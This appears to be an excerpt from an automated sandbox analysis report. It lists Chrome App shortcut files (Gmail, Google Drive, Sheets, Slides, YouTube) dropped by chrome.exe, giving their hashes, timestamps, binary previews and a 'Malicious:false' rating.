                      SHA-512:F28E21475A1EF50B0FDF26C64B3F03FDCF9ADAC3F57E1AA5C4B52F39CF0C30EBE1904848F28148CD6631B793BD25893FD98428132E9D01DD4AA4A162E985929A
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,....q.HI........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*YF.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*YO.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*YO............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*YQ............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............''.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 10 14:58:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):4.012492419038985
                      Encrypted:false
                      SSDEEP:
                      MD5:49B03CE6CAA4DEC9AC35940ED7872B06
                      SHA1:7D87A64C3BA2725D25EBE166B395724898E69E7F
                      SHA-256:DAFF2FA9B86CCBA96E6A88998570DD5B57F8E1925B13237AA28B1D9151758277
                      SHA-512:5E09CDAEC05953E915ADDF08610A07A0CB275D47CE1F037755FA1D06CA59B823CFEB556F98223740DF80401D3480B2AE9EE35D20A2D2055CAC2C49FFB998D656
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....">I........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*YF.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*YO.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*YO............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*YQ............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............''.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2693
                      Entropy (8bit):4.019758127613975
                      Encrypted:false
                      SSDEEP:
                      MD5:662C1BA140F71A8B07A52DDFCA6C87ED
                      SHA1:8CA5EE7FFF2C24AC4D1BB949B66C8D8C0C77E23E
                      SHA-256:0FCC3A0F23D68006F0E07B17442D736492BBAA8443ABE3B7D394421DA3833BE8
                      SHA-512:5D630F2893AE921EE9C0401FAEFD765A7BE5EC9592B75684ED027AE428134AA431DC589B505C2304ADA100F341A64DE7C649F68C86AE52EF2D45648CD88AF9AE
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*YF.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*YO.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*YO............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............''.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 10 14:58:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):4.0070246638199
                      Encrypted:false
                      SSDEEP:
                      MD5:E20E33C88512D1AFADF0C817CF2B2843
                      SHA1:A6C949E2ECE0A883735DB121F0D47BEBA60C3563
                      SHA-256:C9D71A54889896C3E7BD62AE619B2DD36A340EBA4C3636FDD5586608C407EAFB
                      SHA-512:53B13E967249FB2441ECE4E3CCFB34BC3E982120CAED00874C107AF48D930102CC6407E8EC7C797672B8F2EECFD62CF963D00098B956E017ADA5E3B857A374D5
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,......8I........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*YF.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*YO.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*YO............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*YQ............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............''.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 10 14:58:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):3.995138580266338
                      Encrypted:false
                      SSDEEP:
                      MD5:53E3495F4357D02C1B1C7A38E29ACF88
                      SHA1:810B77A4FDA344131094615AAEF8D399A2A54D6B
                      SHA-256:FC9993615FD8C9437CF464D73CB87653317C01EDCDD239DA92C3172202FB8FAC
                      SHA-512:3D4ED5BF46D2BC8880B357332F29F8BF3D6EACB2EBFFEC7A6B771A23BFC1971F12602324066CB65891CDE8A9F8BF03CC44924516DAAFE463F509755A9484D0CA
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,....1zCI........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*YF.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*YO.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*YO............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*YQ............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............''.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 10 14:58:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2683
                      Entropy (8bit):4.009126313894493
                      Encrypted:false
                      SSDEEP:
                      MD5:644F3F7E0C041DD78FFE996471A2A573
                      SHA1:7A0D4F29DEFA337A69180905243BB58B0E97DDF7
                      SHA-256:0FE35936CD68A9239C004DED609862FB909EE1CA5F81E1041C5B7EAD4961F43B
                      SHA-512:42D07975B8E656D8B51AF3C313B9EE69D002D0BE52A9482613FCB2D06536C8D538A75564D6E25EEAF491DFB9A20DA71D29A8046EE2708ED4910A2AB7ADBB8FAA
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,......0I........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I*YF.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*YO.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V*YO.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V*YO............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*YQ............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............''.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      Static File Info

                      No static file info